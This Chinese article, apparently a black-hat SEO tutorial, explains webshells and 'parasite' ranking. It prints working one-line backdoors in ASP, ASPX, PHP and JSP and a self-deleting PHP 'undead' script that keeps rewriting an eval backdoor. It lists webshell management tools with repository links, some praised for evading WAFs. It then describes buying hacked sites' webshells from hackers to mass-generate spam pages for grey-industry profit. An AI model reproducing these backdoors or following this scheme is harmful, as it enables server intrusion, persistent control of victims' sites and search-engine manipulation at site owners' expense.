WEBSHELL寄生蟲的排名原理和作用分析
很多剛接觸黑帽SEO的朋友會問到什么是寄生蟲排名技術(shù),寄生蟲主要用來做什么的,有什么作用啊之類的問題。寄生蟲排名技術(shù)的發(fā)展也是有一定的歷史的,從最初的使用到后來黑帽SEO優(yōu)化技術(shù)中的普及,再到目前的百度快速排名甚至百度霸屏的案例中,都存在寄生蟲技術(shù)的身影。
也就是說,在真正操作黑帽SEO優(yōu)化中,寄生蟲排名這種技術(shù)也是大家接觸的最為頻繁的一個工具甚至說是一門技術(shù)手法。
下面來給大家詳細講一下黑帽SEO技術(shù)中關(guān)于webshell與寄生蟲排名技術(shù)的一些知識點。
什么是WebShell?
顧名思義,“web”的含義是顯然需要服務(wù)器開放web服務(wù),“shell”的含義是取得對服務(wù)器某種程度上操作權(quán)限。webshell常常被稱為入侵者通過網(wǎng)站端口對網(wǎng)站服務(wù)器的某種程度上操作的權(quán)限。由于webshell其大多是以動態(tài)腳本的形式出現(xiàn),也有人稱之為網(wǎng)站的后門工具。
Webshell就是以asp、php、jsp或者cgi等網(wǎng)頁文件形式存在的一種代碼執(zhí)行環(huán)境,也可以將其稱做為一種網(wǎng)頁后門。黑客在入侵了一個網(wǎng)站后,通常會將asp或php后門文件與網(wǎng)站目錄下正常的網(wǎng)頁文件混在一起,然后就可以使用瀏覽器來訪問asp或者php后門,得到一個命令執(zhí)行環(huán)境,以達到控制網(wǎng)站服務(wù)器的目的。
利用Webshell可以在Web服務(wù)器上執(zhí)行系統(tǒng)命令、竊取數(shù)據(jù)、植入病毒、Le索核心數(shù)據(jù)、SEO掛馬等惡意操作,危害極大。
WebShell的特點
黑客使用Webshell的第一步通常是將其上傳到可以訪問的服務(wù)器中,例如利用用戶CMS系統(tǒng)的第三方插件中的漏洞上傳一個簡單的php Webshell。當(dāng)然,Webshell類型和作用也不完全相同,一些簡單的Webshell只起到連接外界的作用,允許黑客插入更加精準的惡意腳本,執(zhí)行他們所需要的指令;另外一些則可能更加復(fù)雜,帶有數(shù)據(jù)庫或文件瀏覽器,讓黑客能夠從數(shù)千英里之外的地方查看入侵系統(tǒng)的代碼和數(shù)據(jù)。無論何種設(shè)計,Webshell都極其危險,是網(wǎng)絡(luò)罪犯和高級持續(xù)威脅(APTs)的常用工具。Webshell常見的攻擊特點主要有以下幾點:
持久化遠程訪問
Webshell腳本通常會包含后門,黑客上傳Webshell之后,就可以充分利用Webshell的后門實現(xiàn)遠程訪問并控制服務(wù)器,從而達到長期控制網(wǎng)站服務(wù)器的目的。此外,在上傳完Webshell之后,黑客會選擇自己修復(fù)漏洞,以確保沒有其他人會利用該漏洞。通過這種方式,黑客就可以一種低調(diào)的姿態(tài),避免與管理員進行任何交互,同時仍然獲得相同的結(jié)果。
提權(quán)
在服務(wù)器沒有配置錯誤的情況下,Webshell將在web服務(wù)器的用戶權(quán)限下運行,而用戶權(quán)限是有限的。通過Webshell,黑客可以利用系統(tǒng)上的本地漏洞來實現(xiàn)權(quán)限提升,從而獲得Root權(quán)限,這樣黑客基本上可以在系統(tǒng)上做任何事情,包括安裝軟件、更改權(quán)限、添加和刪除用戶、竊取密碼、閱讀電子郵件等等。
隱蔽性極強
Webshell可以嵌套在正常網(wǎng)頁中運行,且不容易被查殺。它還可以穿越服務(wù)器防火墻,由于與被控制的服務(wù)器或遠程主機交互的數(shù)據(jù)都是通過80端口傳遞,因此不會被防火墻攔截,在沒有記錄流量的情況下,Webshell使用post包發(fā)送,也不會被記錄在系統(tǒng)日志中,只會在Web日志中記錄一些數(shù)據(jù)提交的記錄。
WebShell的分類
Webshell根據(jù)腳本可以分為PHP腳本木馬,ASP腳本木馬,JSP腳本木馬,也有基于.NET的腳本木馬。根據(jù)時代和技術(shù)的變遷,也有用python和lua編寫的腳本木馬,常用有如下幾種:
大馬
•體積大,功能全•會調(diào)用系統(tǒng)關(guān)鍵函數(shù)•以代碼加密進行隱藏
小馬
•體積小,功能少•一般只有一個上傳功能,用于上傳大馬
一句話木馬
•代碼短•使用場景大,可單獨生成文件,可插入文件•安全性高,隱藏性強,可變形免殺•框架不變,數(shù)據(jù)執(zhí)行,數(shù)據(jù)傳遞
打包馬
•主要用于打包網(wǎng)站源碼
拖庫馬
•主要用于導(dǎo)出網(wǎng)站數(shù)據(jù)庫
內(nèi)存馬
•無文件落地•極難檢測和發(fā)現(xiàn)•難以清除
注:之后所講的WebShell就是指一句話木馬
WebShell的原理
Webshell的惡意性表現(xiàn)在它的實現(xiàn)功能上,是一段帶有惡意目的的正常腳本代碼。
不同腳本類型的一句話木馬:
<%eval?request(“cmd”)%>
<%@?Page?Language=”Jscript”%><%eval(Request.Item[“cmd”],”unsafe”);%>
<?php @eval($_POST[‘cmd’]); ?>
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
這里僅對PHP的一句話木馬進行分析,核心步驟如下:
數(shù)據(jù)的傳遞
•$_GET、$_POST、$_COOKIES、$_REQUEST、$_FILE、$_SERVER•從遠程遠程URL中獲取數(shù)據(jù): file_get_contents、curl、svn_checkout...(將需要執(zhí)行的指令數(shù)據(jù)放在遠程URL中,通過URL_INCLUDE來讀取)•從本地磁盤文件中獲取數(shù)據(jù): file、file_get_contents...(將需要執(zhí)行的指令數(shù)據(jù)放在本地磁盤文件中,利用IO函數(shù)來讀取)•從數(shù)據(jù)庫中讀取(將需要執(zhí)行的指令放在數(shù)據(jù)庫中,利用數(shù)據(jù)庫函數(shù)來讀取)•從圖片頭部中獲取: exif_read_data...(將需要執(zhí)行的指令數(shù)據(jù)放在圖片頭部中,利用圖片操作函數(shù)來讀取)
代碼執(zhí)行
將用戶傳輸?shù)臄?shù)據(jù)進行執(zhí)行
•代碼執(zhí)行函數(shù):eval、assert、system…執(zhí)行(這是最普通、標準的代碼執(zhí)行)•LFI:include、require...(利用瀏覽器的偽協(xié)議將文件包含轉(zhuǎn)化為代碼執(zhí)行)•動態(tài)函數(shù)執(zhí)行:($()...PHP的動態(tài)函數(shù)特性)•Curly Syntax:(${${…}}...這種思路可以把變量賦值的漏洞轉(zhuǎn)化為代碼執(zhí)行的機會)
內(nèi)存馬
有關(guān)Java內(nèi)存馬以及JspWebShell的免殺我打算之后在Java代碼審計中詳細講解,這里就全部以PHP的腳本木馬為主。
何為內(nèi)存馬?
內(nèi)存馬是無文件攻擊的一種常用手段,隨著攻防演練熱度越來越高:攻防雙方的博弈,流量分析、EDR等專業(yè)安全設(shè)備被藍方廣泛使用,傳統(tǒng)的文件上傳的webshll或以文件形式駐留的后門越來越容易被檢測到,內(nèi)存馬使用越來越多。
Webshell內(nèi)存馬,是在內(nèi)存中寫入惡意后門和木馬并執(zhí)行,達到遠程控制Web服務(wù)器的一類內(nèi)存馬,其瞄準了企業(yè)的對外窗口:網(wǎng)站、應(yīng)用。但傳統(tǒng)的Webshell都是基于文件類型的,黑客可以利用上傳工具或網(wǎng)站漏洞植入木馬,區(qū)別在于Webshell內(nèi)存馬是無文件馬,利用中間件的進程執(zhí)行某些惡意代碼,不會有文件落地,給檢測帶來巨大難度。
PHP內(nèi)存馬
PHP內(nèi)存馬,也叫做PHP不死馬、不死僵尸,在線下AWD中是常用手段之一。在蟻劍中也有專門的插件可以一鍵注入內(nèi)存馬。原理也很簡單,相對于Java可以直接把整個shell寫入內(nèi)存,php內(nèi)存馬的實現(xiàn)則是將一個木馬反復(fù)寫入,達到無法刪除的目的。
<?php
ignore_user_abort(true); //設(shè)置客戶端斷開連接時是否中斷腳本的執(zhí)行
set_time_limit(0); //設(shè)置腳本最大執(zhí)行時間linux下可能不大好用
unlink(__FILE__); //刪除自身
$file = 'shell.php';
$code = '<?php @eval($_POST["cmd"]);?>';
while (1) {
file_put_contents($file, $code);//惡意代碼
usleep(5000); //延遲執(zhí)行可有可無
}
?>
本質(zhì)上原理是不變大,執(zhí)行死循環(huán),然后刪除自身。但實際上這樣做還是會有文件落地,只是管理員刪不掉、刪不完罷了。我們也可以用利用fastcgi對php攻擊執(zhí)行命令,但這樣是否算一個駐留wenshell還有待爭議。
WebShell管理工具
中國菜刀(Chopper)
中國菜刀是一款專業(yè)的網(wǎng)站管理軟件,用途廣泛,使用方便,小巧實用。只要支持動態(tài)腳本的網(wǎng)站,都可以用中國菜刀來進行管理!在非簡體中文環(huán)境下使用,自動切換到英文界面。UNICODE方式編譯,支持多國語言輸入顯示。
蟻劍(AntSword)
中國蟻劍是一款開源的跨平臺網(wǎng)站管理工具,它主要面向于合法授權(quán)的滲透測試安全人員以及進行常規(guī)操作的網(wǎng)站管理員。任何人不得將其用于非法用途以及盈利等目的,否則后果自行承擔(dān)!使用編/解碼器進行流量混淆可繞過WAF,并且有多款實用插件。
項目地址:
•https://github.com/AntSwordProject/antSword
冰蝎(Behinder)
冰蝎是一款基于Java開發(fā)的動態(tài)二進制加密通信流量的新型Webshell客戶端,由于它的通信流量被加密,使用傳統(tǒng)的WAF、IDS等設(shè)備難以檢測,目前在HVV中使用較多的一款工具。
項目地址:
•http://github.com/rebeyond/Behinder
哥斯拉(Godzilla)
哥斯拉是一款繼冰蝎之后又一款于Java開發(fā)的加密通信流量的新型Webshell客戶端,內(nèi)置了3種有效載荷以及6種加密器,6種支持腳本后綴,20個內(nèi)置插件,也是目前在HVV中使用較多的一款工具。
•項目地址:https://github.com/BeichenDream/Godzilla
C刀(Cknife)
C刀是一款基于Java開發(fā)的完全基于配置文件的中國菜刀,跨平臺,腳本類型支持ASP、ASPX、PHP、JSP、JSPX、Customize,目前完成的功能有:文件管理、數(shù)據(jù)庫管理、模擬終端以及代理設(shè)置等。
項目地址:
•https://github.com/Chora10/Cknife
Web版菜刀(WebKnife)
WebKnife是陌小離練習(xí)ajax時候?qū)懙囊豢畎氤善稺eb版菜刀,目前完成的功能有:文件管理,虛擬終端,文件查看,圖片查看,一鍵掛黑,作者居然還是個00后,tql!
項目地址:
•https://github.com/MoLeft/WebKnife
XISE
XISE是小駿用易語言開發(fā)的一款類似于中國菜刀的Webshell網(wǎng)站管理工具,早些年做黑帽SEO的基本人手一份,現(xiàn)在已經(jīng)停止更新,至于什么原因,大家都懂的!!!
開山斧
開山斧是一款基于Python 2.7X + QT4開發(fā)的一款跨平臺菜刀 (Win/Linux/Mac),體積比較大,剛出來時只用過一次,現(xiàn)在用的人應(yīng)該不多,也已經(jīng)停止更新了。
項目地址:
•https://github.com/pyqteval/evlal_win
K8飛刀
K8飛刀是K8哥哥開發(fā)的一款Webshell網(wǎng)站管理工具,不得不說他開發(fā)的安全工具都很強大且實用,只不過個人感覺略顯臃腫,對新人來說可能不是很友好,有興趣的可以自己去看一下。
項目地址:
•https://github.com/k8gege/K8tools
Weevely
Weevely是一款python編寫的生成和管理php webshell的安全測試工具,目前擁有30多個模塊:文件管理、命令執(zhí)行、數(shù)據(jù)庫管理、端口掃描等功能,部分模塊不支持在Windows環(huán)境下使用。
項目地址:
•https://github.com/epinna/weevely3
WeBaCoo
WeBaCoo是一款Perl語言編寫的Web后門工具,它的特別之處在于Web服務(wù)器和客戶端之間的通信載體是Cookie,這就意味著多數(shù)的殺毒軟件、網(wǎng)絡(luò)入侵檢測/防御系統(tǒng)、網(wǎng)絡(luò)防火墻和應(yīng)用程序防火墻都無法檢測到該后門的存在。當(dāng)然,這只是以前的介紹,現(xiàn)在基本都會被檢測了。
一、什么是寄生蟲
寄生蟲排名大多數(shù)都是通過從黑客手里購買站點webshell,然后對其站點不斷生成新的頁面產(chǎn)生排名,進行變相無限繁殖。
但有兩點需要注意:
1、一般高權(quán)重網(wǎng)站的shell權(quán)限很難獲取,因為這類網(wǎng)站大都有專業(yè)技術(shù)人員在管理維護,黑客沒那么容易拿到權(quán)限。
2、一般低權(quán)重網(wǎng)站就算你拿到了權(quán)限,但也對你排名沒什么很大的價值。
二、常見寄生蟲程序簡介
目前市面上有很多寄生蟲程序,但告訴大家其實這些程序的功能大多相似,主要還是在于寄生蟲程序模版的選擇與使用,是否更適應(yīng)搜索引擎的排名算法。影響寄生蟲排名的最終結(jié)果主要取決于webshell的質(zhì)量度。沒有強大的高質(zhì)量的shell,再好的寄生蟲程序也做不出來很好的效果。同樣的話,假如你的webshell質(zhì)量度很高,相對來說你所繁殖生成的關(guān)鍵詞URL鏈接頁面就會通過該shell的主站權(quán)重傳遞獲得一個相對不錯的排名結(jié)果。
三、寄生蟲的種類
1、從類型上看,寄生蟲程序主要分兩種,即動態(tài)寄生蟲和靜態(tài)寄生蟲。簡單理解就是生成繁殖的URL鏈接形式分為動態(tài)連接和靜態(tài)鏈接這兩種形式,從生成的頁面鏈接上就可以看的出來。
2、從程序語言上看,寄生蟲程序又分為ASP版寄生蟲和PHP版寄生蟲,編寫使用語言不同,所繁殖生成的頁面URL鏈接形式也不同。這里大家主要作為了解即可。
四、寄生蟲的排名工作原理
1、寄生蟲程序區(qū)別于很多黑帽SEO程序,那么寄生蟲大家都不陌生。但寄生蟲真正的工作原理,是為了更高效率的生存。首先要知道寄生蟲的前身是泛目錄,泛目錄的前身是目錄輪鏈,目錄輪鏈的前身是橋頁。
2、寄生蟲分為客戶端與服務(wù)端,新手會有顧慮,為何搞出服務(wù)端這么麻煩。但如果是大批量操作,寄生蟲非常節(jié)省時間,協(xié)助能力也非常的高。
3、寄生蟲的原理是通過客戶端獲取服務(wù)器端信息繁殖,因此客戶端就很簡單,只有一個文件,但客戶端放到Shell網(wǎng)站,即可指定的獲取服務(wù)器端信息,服務(wù)器端信息配置更新,客戶端也會對新的信息進行生成輪鏈。那么客戶端是獲取服務(wù)器端信息的,同樣就需要配置服務(wù)器端,服務(wù)器端進行一次配置。以后不管有幾個Shell站,都可以同時用服務(wù)器端配置好的信息。
4、配置好服務(wù)器端后,客戶端獲取地址填寫架設(shè)服務(wù)器端的地址,客戶端放到自己網(wǎng)站、放到Shell站中即會產(chǎn)生數(shù)十個目錄輪鏈地址,此時你看到的并不是和泛目錄一樣有很多的目錄,寄生蟲是繁殖的,通過百度蜘蛛或者人工每次訪問,在有訪問的情況下,不管是人工還是蜘蛛,都會在進行繁殖生成的。
5.寄生蟲繁殖可以通過多個Shell無限繁殖,那么值得一說的,寄生蟲同樣有Shell站群功能,通過不同的Shell生成,客戶端會返回URL數(shù)據(jù)到服務(wù)器端,服務(wù)器端記錄下此次的繁殖數(shù)據(jù),在下次不同的Shell進行繁殖,會鏈接上上一次繁殖的頁面。寄生蟲站群相互鏈接功能,在多個Shell中,寄生蟲會記錄每個URL并進行相互的站群導(dǎo)入導(dǎo)出輪鏈操作。
這就是寄生蟲繁殖的功能,每次生成數(shù)十個頁面,通過蜘蛛的來訪,會再繁殖幾十個頁面,以此循環(huán)。
五、寄生蟲的作用
1.在有效的資源下,把所有想做的關(guān)鍵詞都建立在一個龐大的資源上(適用于灰色產(chǎn)業(yè))。
2.能夠快速的實現(xiàn)大量長尾詞甚至核心詞在搜索引擎上的一個排名提現(xiàn),帶來收益。
總結(jié):
寄生蟲通過建立強大的鏈接資源庫,推動網(wǎng)站關(guān)鍵詞排名上升,實現(xiàn)寄生蟲的最終目的從搜索引擎端獲取到最大規(guī)模的流量,通過良好的商業(yè)模式,實現(xiàn)盈利。
